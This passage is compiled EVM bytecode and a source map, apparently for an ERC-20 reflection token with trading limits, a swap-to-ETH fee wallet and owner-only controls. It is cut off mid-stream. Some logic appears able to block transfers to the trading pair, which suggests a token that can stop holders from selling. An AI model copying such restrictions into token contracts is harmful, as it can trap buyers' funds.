460ff16611324576112b66109cb565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614611323576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161131a90612de5565b60405180910390fd5b5b601454811115611369576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161136090612e51565b60405180910390fd5b601360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161461141657601554816113cb846107a2565b6113d59190612e71565b10611415576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161140c90612f39565b60405180910390fd5b5b6000611421306107a2565b905060006016548210159050600a60165461143c9190612f59565b821061145457600a6016546114519190612f59565b91505b601360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614156114c157662386f26fc1000060155414156114c057600080fd5b5b8080156114db5750601360159054906101000a900460ff16155b80156115355750601360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b801561154d5750601360169054906101000a900460ff165b80156115a35750600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156115f95750600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156116275761160782611a69565b600047905066b1a2bc2ec50000811115611625576116244761198f565b5b505b50505b600060019050600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806116d15750600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b806117845750601360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16141580156117835750601360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b5b156117925760009050611919565b601360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561183d5750601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b1561185557600854600c81905550600954600d819055505b601360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161480156119005750601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561191857600a54600c81905550600b54600d819055505b5b61192584848484611cf1565b50505050565b6000838311158290611973576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161196a91906124ae565b60405180910390fd5b50600083856119829190612fb3565b9050809150509392505050565b601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc829081150290604051600060405180830381858888f193505050501580156119f7573d6000803e3d6000fd5b5050565b6000600654821115611a42576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a3990613059565b60405180910390fd5b6000611a4c611d1e565b9050611a618184611d4990919063ffffffff16565b915050919050565b6001601360156101000a81548160ff0219169083151502179055506000600267ffffffffffffffff811115611aa157611aa0613079565b5b604051908082528060200260200182016040528015611acf5781602001602082028036833780820191505090505b5090503081600081518110611ae757611ae6612960565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b158015611b8957600080fd5b505afa158015611b9d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611bc191906130bd565b81600181518110611bd557611bd4612960565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050611c3c30601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610f31565b601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b8152600401611ca09594939291906131e3565b600060405180830381600087803b158015611cba57600080fd5b505af1158015611cce573d6000803e3d6000fd5b50505050506000601360156101000a81548160ff02191690831515021790555050565b80611cff57611cfe611d93565b5b611d0a848484611dd6565b80611d1857611d17611fa1565b5b50505050565b6000806000611d2b611fb5565b91509150611d428183611d4990919063ffffffff16565b9250505090565b6000611d8b83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250612011565b905092915050565b6000600c54148015611da757506000600d54145b15611db157611dd4565b600c54600e81905550600d54600f819055506000600c819055506000600d819055505b565b600080600080600080611de887612074565b955095509550955095509550611e4686600260008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546120dc90919063ffffffff16565b600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611edb85600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461212690919063ffffffff16565b600260008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611f2781612184565b611f318483612241565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051611f8e919061266d565b60405180910390a3505050505050505050565b600e54600c81905550600f54600d81905550565b600080600060065490506000662386f26fc100009050611fe7662386f26fc10000600654611d4990919063ffffffff16565b82101561200457600654662386f26fc1000093509350505061200d565b81819350935050505b9091565b60008083118290612058576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161204f91906124ae565b60405180910390fd5b5060008385612067919061326c565b9050809150509392505050565b60008060008060008060008060006120918a600c54600d5461227b565b92509250925060006120a1611d1e565b905060008060006120b48e878787612311565b9250925092508282828989899c509c509c509c509c509c505050505050505091939550919395565b600061211e83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061192b565b905092915050565b60008082846121359190612e71565b90508381101561217a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612171906132e9565b60405180910390fd5b8091505092915050565b600061218e611d1e565b905060006121a5828461239a90919063ffffffff16565b90506121f981600260003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461212690919063ffffffff16565b600260003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505050565b612256826006546120dc90919063ffffffff16565b6006819055506122718160075461212690919063ffffffff16565b6007819055505050565b6000806000806122a76064612299888a61239a90919063ffffffff16565b611d4990919063ffffffff16565b905060006122d160646122c3888b61239a90919063ffffffff16565b611d4990919063ffffffff16565b905060006122fa826122ec858c6120dc90919063ffffffff16565b6120dc90919063ffffffff16565b905080838395509550955050505093509350939050565b60008060008061232a858961239a90919063ffffffff16565b90506000612341868961239a90919063ffffffff16565b90506000612358878961239a90919063ffffffff16565b905060006123818261237385876120dc90919063ffffffff16565b6120dc90919063ffffffff16565b9050838184965096509650505050509450945094915050565b6000808314156123ad576000905061240f565b600082846123bb9190612f59565b90508284826123ca919061326c565b1461240a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016124019061337b565b60405180910390fd5b809150505b92915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561244f578082015181840152602081019050612434565b8381111561245e576000848401525b50505050565b6000601f19601f8301169050919050565b600061248082612415565b61248a8185612420565b935061249a818560208601612431565b6124a381612464565b840191505092915050565b600060208201905081810360008301526124c88184612475565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000612505826124da565b9050919050565b612515816124fa565b811461252057600080fd5b50565b6000813590506125328161250c565b92915050565b6000819050919050565b61254b81612538565b811461255657600080fd5b50565b60008135905061256881612542565b92915050565b60008060408385031215612585576125846124d0565b5b600061259385828601612523565b92505060206125a485828601612559565b9150509250929050565b60008115159050919050565b6125c3816125ae565b82525050565b60006020820190506125de60008301846125ba565b92915050565b6000819050919050565b60006126096126046125ff846124da565b6125e4565b6124da565b9050919050565b600061261b826125ee565b9050919050565b600061262d82612610565b9050919050565b61263d81612622565b82525050565b60006020820190506126586000830184612634565b92915050565b61266781612538565b82525050565b6000602082019050612682600083018461265e565b92915050565b6000806000606084860312156126a1576126a06124d0565b5b60006126af86828701612523565b93505060206126c086828701612523565b92505060406126d186828701612559565b9150509250925092565b600060ff82169050919050565b6126f1816126db565b82525050565b600060208201905061270c60008301846126e8565b92915050565b61271b816124fa565b82525050565b60006020820190506127366000830184612712565b92915050565b612745816125ae565b811461275057600080fd5b50565b6000813590506127628161273c565b92915050565b60006020828403121561277e5761277d6124d0565b5b600061278c84828501612753565b91505092915050565b6000602082840312156127ab576127aa6124d0565b5b60006127b984828501612523565b91505092915050565b6000602082840312156127d8576127d76124d0565b5b60006127e684828501612559565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f840112612814576128136127ef565b5b8235905067ffffffffffffffff811115612831576128306127f4565b5b60208301915083602082028301111561284d5761284c6127f9565b5b9250929050565b60008060006040848603121561286d5761286c6124d0565b5b600084013567ffffffffffffffff81111561288b5761288a6124d5565b5b612897868287016127fe565b935093505060206128aa86828701612753565b9150509250925092565b600080604083850312156128cb576128ca6124d0565b5b60006128d985828601612523565b92505060206128ea85828601612523565b9150509250929050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061292a602083612420565b9150612935826128f4565b602082019050919050565b600060208201905081810360008301526129598161291d565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006129c982612538565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8214156129fc576129fb61298f565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000612a63602683612420565b9150612a6e82612a07565b604082019050919050565b60006020820190508181036000830152612a9281612a56565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612af5602483612420565b9150612b0082612a99565b604082019050919050565b60006020820190508181036000830152612b2481612ae8565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000612b87602283612420565b9150612b9282612b2b565b604082019050919050565b60006020820190508181036000830152612bb681612b7a565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612c19602583612420565b9150612c2482612bbd565b604082019050919050565b60006020820190508181036000830152612c4881612c0c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612cab602383612420565b9150612cb682612c4f565b604082019050919050565b60006020820190508181036000830152612cda81612c9e565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612d3d602983612420565b9150612d4882612ce1565b604082019050919050565b60006020820190508181036000830152612d6c81612d30565b9050919050565b7f544f4b454e3a2054686973206163636f756e742063616e6e6f742073656e642060008201527f746f6b656e7320756e74696c2074726164696e6720697320656e61626c656400602082015250565b6000612dcf603f83612420565b9150612dda82612d73565b604082019050919050565b60006020820190508181036000830152612dfe81612dc2565b9050919050565b7f544f4b454e3a204d6178205472616e73616374696f6e204c696d697400000000600082015250565b6000612e3b601c83612420565b9150612e4682612e05565b602082019050919050565b60006020820190508181036000830152612e6a81612e2e565b9050919050565b6000612e7c82612538565b9150612e8783612538565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115612ebc57612ebb61298f565b5b828201905092915050565b7f544f4b454e3a2042616c616e636520657863656564732077616c6c657420736960008201527f7a65210000000000000000000000000000000000000000000000000000000000602082015250565b6000612f23602383612420565b9150612f2e82612ec7565b604082019050919050565b60006020820190508181036000830152612f5281612f16565b9050919050565b6000612f6482612538565b9150612f6f83612538565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615612fa857612fa761298f565b5b828202905092915050565b6000612fbe82612538565b9150612fc983612538565b925082821015612fdc57612fdb61298f565b5b828203905092915050565b7f416d6f756e74206d757374206265206c657373207468616e20746f74616c207260008201527f65666c656374696f6e7300000000000000000000000000000000000000000000602082015250565b6000613043602a83612420565b915061304e82612fe7565b604082019050919050565b6000602082019050818103600083015261307281613036565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6000815190506130b78161250c565b92915050565b6000602082840312156130d3576130d26124d0565b5b60006130e1848285016130a8565b91505092915050565b6000819050919050565b600061310f61310a613105846130ea565b6125e4565b612538565b9050919050565b61311f816130f4565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61315a816124fa565b82525050565b600061316c8383613151565b60208301905092915050565b6000602082019050919050565b600061319082613125565b61319a8185613130565b93506131a583613141565b8060005b838110156131d65781516131bd8882613160565b97506131c883613178565b9250506001810190506131a9565b5085935050505092915050565b600060a0820190506131f8600083018861265e565b6132056020830187613116565b81810360408301526132178186613185565b90506132266060830185612712565b613233608083018461265e565b9695505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061327782612538565b915061328283612538565b9250826132925761329161323d565b5b828204905092915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b60006132d3601b83612420565b91506132de8261329d565b602082019050919050565b60006020820190508181036000830152613302816132c6565b9050919050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b6000613365602183612420565b915061337082613309565b604082019050919050565b6000602082019050818103600083015261339481613358565b905091905056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122071f6ca7863dc754c0a27b4cce49e73e03e2283c29bf26e33da31c3e0580387ac64736f6c63430008090033

Deployed Bytecode Sourcemap

4310:12513:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6719:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7644:193;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5565:41;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6996:95;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7845:446;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5867:50;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6905:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5613:28;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16106:101;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12318:143;;;;;;;;;;;;;:::i;:::-;;7099:138;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1797:148;;;;;;;;;;;;;:::i;:::-;;16411:163;;;;;;;;;;;;;:::i;:::-;;5763:44;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1583:79;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16234:101;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5814:46;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6810:87;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15915:139;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7245:199;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16584:234;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7452:184;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1953:244;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6719:83;6756:13;6789:5;;;;;;;;;;;;;;;;;6782:12;;6719:83;:::o;7644:193::-;7746:4;7768:39;7777:12;:10;:12::i;:::-;7791:7;7800:6;7768:8;:39::i;:::-;7825:4;7818:11;;7644:193;;;;:::o;5565:41::-;;;;;;;;;;;;;:::o;6996:95::-;7049:7;4859:16;7069:14;;6996:95;:::o;7845:446::-;7977:4;7994:36;8004:6;8012:9;8023:6;7994:9;:36::i;:::-;8041:220;8064:6;8085:12;:10;:12::i;:::-;8112:138;8168:6;8112:138;;;;;;;;;;;;;;;;;:11;:19;8124:6;8112:19;;;;;;;;;;;;;;;:33;8132:12;:10;:12::i;:::-;8112:33;;;;;;;;;;;;;;;;:37;;:138;;;;;:::i;:::-;8041:8;:220::i;:::-;8279:4;8272:11;;7845:446;;;;;:::o;5867:50::-;;;;:::o;6905:83::-;6946:5;4533:1;6964:16;;6905:83;:::o;5613:28::-;;;;;;;;;;;;;:::o;16106:101::-;1720:12;:10;:12::i;:::-;1710:22;;:6;;;;;;;;;;:22;;;1702:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;16187:12:::1;16173:11;;:26;;;;;;;;;;;;;;;;;;16106:101:::0;:::o;12318:143::-;12360:26;12389:21;12360:50;;12421:32;12434:18;12421:12;:32::i;:::-;12349:112;12318:143::o;7099:138::-;7165:7;7192:37;7212:7;:16;7220:7;7212:16;;;;;;;;;;;;;;;;7192:19;:37::i;:::-;7185:44;;7099:138;;;:::o;1797:148::-;1720:12;:10;:12::i;:::-;1710:22;;:6;;;;;;;;;;:22;;;1702:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;1904:1:::1;1867:40;;1888:6;::::0;::::1;;;;;;;;1867:40;;;;;;;;;;;;1935:1;1918:6:::0;::::1;:19;;;;;;;;;;;;;;;;;;1797:148::o:0;16411:163::-;16477:19;;;;;;;;;;;16461:35;;:12;:10;:12::i;:::-;:35;;;16453:45;;;;;;4859:16;16509:12;:22;;;;4859:16;16542:14;:24;;;;16411:163::o;5763:44::-;;;;:::o;1583:79::-;1621:7;1648:6;;;;;;;;;;;1641:13;;1583:79;:::o;16234:101::-;1720:12;:10;:12::i;:::-;1710:22;;:6;;;;;;;;;;:22;;;1702:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;16315:12:::1;16301:11;;:26;;;;;;;;;;;;;;;;;;16234:101:::0;:::o;5814:46::-;;;;:::o;6810:87::-;6849:13;6882:7;;;;;;;;;;;;;;;;;6875:14;;6810:87;:::o;15915:139::-;1720:12;:10;:12::i;:::-;1710:22;;:6;;;;;;;;;;:22;;;1702:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;16028:18:::1;16006:19;:40;;;;15915:139:::0;:::o;7245:199::-;7350:4;7372:42;7382:12;:10;:12::i;:::-;7396:9;7407:6;7372:9;:42::i;:::-;7432:4;7425:11;;7245:199;;;;:::o;16584:234::-;1720:12;:10;:12::i;:::-;1710:22;;:6;;;;;;;;;;:22;;;1702:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;16701:9:::1;16697:114;16720:8;;:15;;16716:1;:19;16697:114;;;16791:8;16757:18;:31;16776:8;;16785:1;16776:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;16757:31;;;;;;;;;;;;;;;;:42;;;;;;;;;;;;;;;;;;16737:3;;;;;:::i;:::-;;;;16697:114;;;;16584:234:::0;;;:::o;7452:184::-;7569:7;7601:11;:18;7613:5;7601:18;;;;;;;;;;;;;;;:27;7620:7;7601:27;;;;;;;;;;;;;;;;7594:34;;7452:184;;;;:::o;1953:244::-;1720:12;:10;:12::i;:::-;1710:22;;:6;;;;;;;;;;:22;;;1702:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;2062:1:::1;2042:22;;:8;:22;;;;2034:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;2152:8;2123:38;;2144:6;::::0;::::1;;;;;;;;2123:38;;;;;;;;;;;;2181:8;2172:6;::::0;:17:::1;;;;;;;;;;;;;;;;;;1953:244:::0;:::o;342:98::-;395:7;422:10;415:17;;342:98;:::o;8982:369::-;9126:1;9109:19;;:5;:19;;;;9101:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9207:1;9188:21;;:7;:21;;;;9180:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9289:6;9259:11;:18;9271:5;9259:18;;;;;;;;;;;;;;;:27;9278:7;9259:27;;;;;;;;;;;;;;;:36;;;;9327:7;9311:32;;9320:5;9311:32;;;9336:6;9311:32;;;;;;:::i;:::-;;;;;;;;8982:369;;;:::o;9359:2353::-;9497:1;9481:18;;:4;:18;;;;9473:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9574:1;9560:16;;:2;:16;;;;9552:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;9644:1;9635:6;:10;9627:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;9716:7;:5;:7::i;:::-;9708:15;;:4;:15;;;;:32;;;;;9733:7;:5;:7::i;:::-;9727:13;;:2;:13;;;;9708:32;9704:1282;;;9797:11;;;;;;;;;;;9792:144;;9845:7;:5;:7::i;:::-;9837:15;;:4;:15;;;9829:91;;;;;;;;;;;;:::i;:::-;;;;;;;;;9792:144;9970:12;;9960:6;:22;;9952:63;;;;;;;;;;;;:::i;:::-;;;;;;;;;10041:13;;;;;;;;;;;10035:19;;:2;:19;;;10032:146;;10108:14;;10099:6;10083:13;10093:2;10083:9;:13::i;:::-;:22;;;;:::i;:::-;:39;10075:87;;;;;;;;;;;;:::i;:::-;;;;;;;;;10032:146;10194:28;10225:24;10243:4;10225:9;:24::i;:::-;10194:55;;10264:12;10303:19;;10279:20;:43;;10264:58;;10386:2;10366:19;;:22;;;;:::i;:::-;10342:20;:46;10339:144;;10465:2;10445:19;;:22;;;;:::i;:::-;10422:45;;10339:144;10506:13;;;;;;;;;;;10500:19;;:2;:19;;;10497:60;;;4859:16;10529:14;;:25;;10521:34;;;;;;10497:60;10577:7;:18;;;;;10589:6;;;;;;;;;;;10588:7;10577:18;:43;;;;;10607:13;;;;;;;;;;;10599:21;;:4;:21;;;;10577:43;:58;;;;;10624:11;;;;;;;;;;;10577:58;:87;;;;;10640:18;:24;10659:4;10640:24;;;;;;;;;;;;;;;;;;;;;;;;;10639:25;10577:87;:114;;;;;10669:18;:22;10688:2;10669:22;;;;;;;;;;;;;;;;;;;;;;;;;10668:23;10577:114;10573:402;;;10712:38;10729:20;10712:16;:38::i;:::-;10769:26;10798:21;10769:50;;10863:17;10842:18;:38;10838:122;;;10905:35;10918:21;10905:12;:35::i;:::-;10838:122;10693:282;10573:402;9742:1244;;9704:1282;10998:12;11013:4;10998:19;;11062:18;:24;11081:4;11062:24;;;;;;;;;;;;;;;;;;;;;;;;;:50;;;;11090:18;:22;11109:2;11090:22;;;;;;;;;;;;;;;;;;;;;;;;;11062:50;11061:102;;;;11126:13;;;;;;;;;;;11118:21;;:4;:21;;;;:44;;;;;11149:13;;;;;;;;;;;11143:19;;:2;:19;;;;11118:44;11061:102;11057:594;;;11190:5;11180:15;;11057:594;;;11273:13;;;;;;;;;;;11265:21;;:4;:21;;;:55;;;;;11304:15;;;;;;;;;;;11290:30;;:2;:30;;;;11265:55;11262:162;;;11353:14;;11341:9;:26;;;;11396:12;;11386:7;:22;;;;11262:162;11483:13;;;;;;;;;;;11477:19;;:2;:19;;;:55;;;;;11516:15;;;;;;;;;;;11500:32;;:4;:32;;;;11477:55;11473:165;;;11565:15;;11553:9;:27;;;;11609:13;;11599:7;:23;;;;11473:165;11057:594;11663:41;11678:4;11684:2;11688:6;11696:7;11663:14;:41::i;:::-;9462:2250;9359:2353;;;:::o;2561:224::-;2681:7;2714:1;2709;:6;;2717:12;2701:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;2741:9;2757:1;2753;:5;;;;:::i;:::-;2741:17;;2776:1;2769:8;;;2561:224;;;;;:::o;12211:99::-;12268:17;;;;;;;;;;;:26;;:34;12295:6;12268:34;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12211:99;:::o;8299:323::-;8394:7;8452;;8441;:18;;8419:110;;;;;;;;;;;;:::i;:::-;;;;;;;;;8540:19;8562:10;:8;:10::i;:::-;8540:32;;8590:24;8602:11;8590:7;:11;;:24;;;;:::i;:::-;8583:31;;;8299:323;;;:::o;11720:483::-;6020:4;6011:6;;:13;;;;;;;;;;;;;;;;;;11798:21:::1;11836:1;11822:16;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11798:40;;11867:4;11849;11854:1;11849:7;;;;;;;;:::i;:::-;;;;;;;:23;;;;;;;;;::::0;::::1;11893:15;;;;;;;;;;;:20;;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;11883:4;11888:1;11883:7;;;;;;;;:::i;:::-;;;;;;;:32;;;;;;;;;::::0;::::1;11926:62;11943:4;11958:15;;;;;;;;;;;11976:11;11926:8;:62::i;:::-;11999:15;;;;;;;;;;;:66;;;12080:11;12106:1;12122:4;12149;12169:15;11999:196;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;;;;;11787:416;6056:5:::0;6047:6;;:14;;;;;;;;;;;;;;;;;;11720:483;:::o;12471:282::-;12627:7;12622:28;;12636:14;:12;:14::i;:::-;12622:28;12661:44;12679:6;12687:9;12698:6;12661:17;:44::i;:::-;12721:7;12716:29;;12730:15;:13;:15::i;:::-;12716:29;12471:282;;;;:::o;15432:164::-;15474:7;15495:15;15512;15531:19;:17;:19::i;:::-;15494:56;;;;15568:20;15580:7;15568;:11;;:20;;;;:::i;:::-;15561:27;;;;15432:164;:::o;3047:132::-;3105:7;3132:39;3136:1;3139;3132:39;;;;;;;;;;;;;;;;;:3;:39::i;:::-;3125:46;;3047:132;;;;:::o;8630:219::-;8690:1;8677:9;;:14;:30;;;;;8706:1;8695:7;;:12;8677:30;8673:43;;;8709:7;;8673:43;8748:9;;8728:17;:29;;;;8786:7;;8768:15;:25;;;;8818:1;8806:9;:13;;;;8840:1;8830:7;:11;;;;8630:219;:::o;12761:610::-;12908:15;12938:23;12976:12;13003:23;13041:12;13068:13;13095:19;13106:7;13095:10;:19::i;:::-;12893:221;;;;;;;;;;;;13143:28;13163:7;13143;:15;13151:6;13143:15;;;;;;;;;;;;;;;;:19;;:28;;;;:::i;:::-;13125:7;:15;13133:6;13125:15;;;;;;;;;;;;;;;:46;;;;13203:39;13226:15;13203:7;:18;13211:9;13203:18;;;;;;;;;;;;;;;;:22;;:39;;;;:::i;:::-;13182:7;:18;13190:9;13182:18;;;;;;;;;;;;;;;:60;;;;13253:16;13263:5;13253:9;:16::i;:::-;13280:23;13292:4;13298;13280:11;:23::i;:::-;13336:9;13319:44;;13328:6;13319:44;;;13347:15;13319:44;;;;;;:::i;:::-;;;;;;;;12882:489;;;;;;12761:610;;;:::o;8857:117::-;8913:17;;8901:9;:29;;;;8951:15;;8941:7;:25;;;;8857:117::o;15604:257::-;15655:7;15664;15684:15;15702:7;;15684:25;;15720:15;4859:16;15720:25;;15770:20;4859:16;15770:7;;:11;;:20;;;;:::i;:::-;15760:7;:30;15756:61;;;15800:7;;4859:16;15792:25;;;;;;;;15756:61;15836:7;15845;15828:25;;;;;;15604:257;;;:::o;3187:223::-;3307:7;3339:1;3335;:5;3342:12;3327:28;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;3366:9;3382:1;3378;:5;;;;:::i;:::-;3366:17;;3401:1;3394:8;;;3187:223;;;;;:::o;13790:615::-;13890:7;13912;13934;13956;13978;14000;14036:23;14061:12;14075:13;14105:40;14117:7;14126:9;;14137:7;;14105:11;:40::i;:::-;14035:110;;;;;;14156:19;14178:10;:8;:10::i;:::-;14156:32;;14200:15;14217:23;14242:12;14271:46;14283:7;14292:4;14298:5;14305:11;14271;:46::i;:::-;14199:118;;;;;;14336:7;14345:15;14362:4;14368:15;14385:4;14391:5;14328:69;;;;;;;;;;;;;;;;;;;13790:615;;;;;;;:::o;2417:136::-;2475:7;2502:43;2506:1;2509;2502:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;2495:50;;2417